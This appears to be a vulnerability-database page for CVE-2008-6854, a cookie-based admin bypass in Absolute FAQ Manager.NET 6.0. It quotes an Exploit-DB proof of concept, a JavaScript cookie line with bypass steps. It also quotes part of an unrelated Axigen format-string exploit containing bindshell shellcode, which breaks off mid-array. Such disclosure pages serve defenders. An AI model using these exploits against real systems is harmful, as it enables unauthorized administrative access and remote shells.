CVE-2008-6854
published 2009-07-14CVE-2008-6854: Xigla Software Absolute FAQ Manager.NET 6.0 allows remote attackers to bypass authentication and gain administrative access by setting a cookie to a certain…
PriorityP356high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.54%
83.0th percentile
Xigla Software Absolute FAQ Manager.NET 6.0 allows remote attackers to bypass authentication and gain administrative access by setting a cookie to a certain value.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xigla | absolute_faq_manager_net | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Absolute FAQ Manager 6.0 - Insecure Cookie Handling
exploitdb·2008-10-31
CVE-2008-6854 Absolute FAQ Manager 6.0 - Insecure Cookie Handling
Absolute FAQ Manager 6.0 - Insecure Cookie Handling
---
#####################################################################################
# Discovered by : Hakxer #
# Script : Absolute FAQ Manager http://www.xigla.com/absolutefmnet/demo.htm #
# Greetz : Allah , All My friend ,www.educ-up.com #
# ------------------------------- #
# Poc : #
# javascript:document.cookie="xlaAFMDEMOadmin=userid=1&lvl=1&s="; #
# #
# [~] Exploit #
# #
# Go To admin login : http://www.xigla.com/absolutefmnet/demo/login.aspx #
# Execute JS Code : javascript:document.cookie="xlaAFMDEMOadmin=userid=1&lvl=1&s="; #
# Now Go to :http://www.xigla.com/absolutefmnet/demo/menu.aspx #
# #
# Absolute Products .. Crashed ( Insecure Cookie Vulnerability ) #
################################################################
Exploit-DB
Axigen 5.0.2 - AXIMilter Remote Format String
exploitdb·2008-01-21
CVE-2008-0434 Axigen 5.0.2 - AXIMilter Remote Format String
Axigen 5.0.2 - AXIMilter Remote Format String
---
/*
* Axigen 5.0.x AXIMilter Format String Exploit
*
* by hempel (JAN 16 2008)
*
* thx to mu-b (digit-labs.org)
*
*/
#include
#include
#include
#include
#include
#include
#include
char buf[] =
"FROM:\r\nEHLO:\r\nCNIP:\r\nCNPO:\r\nCNHO: "
/* offsets */
"\xb8\x96\x05\x08\xb9\x96\x05\x08\xba\x96\x05\x08\xbb\x96\x05\x08"
"\xbc\x96\x05\x08\xbd\x96\x05\x08\xbe\x96\x05\x08\xbf\x96\x05\x08"
"\xc0\x96\x05\x08"
/* format string */
"%35u%6851$n%70u%6850$hhn%47u%6846$hhn%36u%6854$hhn%31u%6853$hhn%"
"17u%6852$hhn%134u%6847$hhn%111u%6848$hhn%259u%6849$hhn"
"\r\nRCPT:\r\nVERI: "
/* bindshell code (port 4141) */
"\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xdc"
"\xc8\x06\xb7\x83\xeb\xfc\xe2\xf4\xed\x13\x55\xf4\x8f\xa2\x04\xdd"
"\xba\x90\
No writeups or analysis indexed.
http://secunia.com/advisories/32472http://www.securityfocus.com/bid/32028https://exchange.xforce.ibmcloud.com/vulnerabilities/46303https://www.exploit-db.com/exploits/6902http://secunia.com/advisories/32472http://www.securityfocus.com/bid/32028https://exchange.xforce.ibmcloud.com/vulnerabilities/46303https://www.exploit-db.com/exploits/6902
2009-07-14
Published